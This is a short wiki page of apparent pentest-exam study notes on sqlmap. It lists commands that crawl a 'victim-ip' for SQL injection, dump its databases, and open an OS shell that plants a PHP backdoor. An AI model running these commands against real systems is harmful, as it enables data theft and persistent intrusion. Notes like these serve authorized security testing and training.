-
Notifications
You must be signed in to change notification settings - Fork 14
Automated Sql Injection Tools
lethanhtung01011980 edited this page Dec 17, 2019
·
15 revisions
- Automated check for sql injection vulnerabilities
- Prohibited in exam.
Ref:
Notes:
-
For long URLs, put '' : sqlmap -u 'http://victim-ip'
-
Scan GET URLs: sqlmap -u http://victim-ip --crawl=3 --batch --threads=5
-
Scan GET URLs and forms: sqlmap -u http://victim-ip --crawl=3 --batch --forms --threads=5
-
SQL injection points: /root/.sqlmap/output/result*
-
Dump result is at /root/.sqlmap/output/victim-ip/dump
-
--batch uses default answer without asking.
-
--threads=THREADS
- sqlmap -m sqlmap-target.txt --crawl=3 --batch --forms --threads=10
- sqlmap-target.txt is http://ip1 for each line.
- sqlmap -u http://victim-ip/comment.php?id=738 --dbms=mysql --dump --threads=5
- sqlmap -u http://victim-ip/comment.php?id=738 --dbms=mysql --os-shell
- Actually create PHP backdoor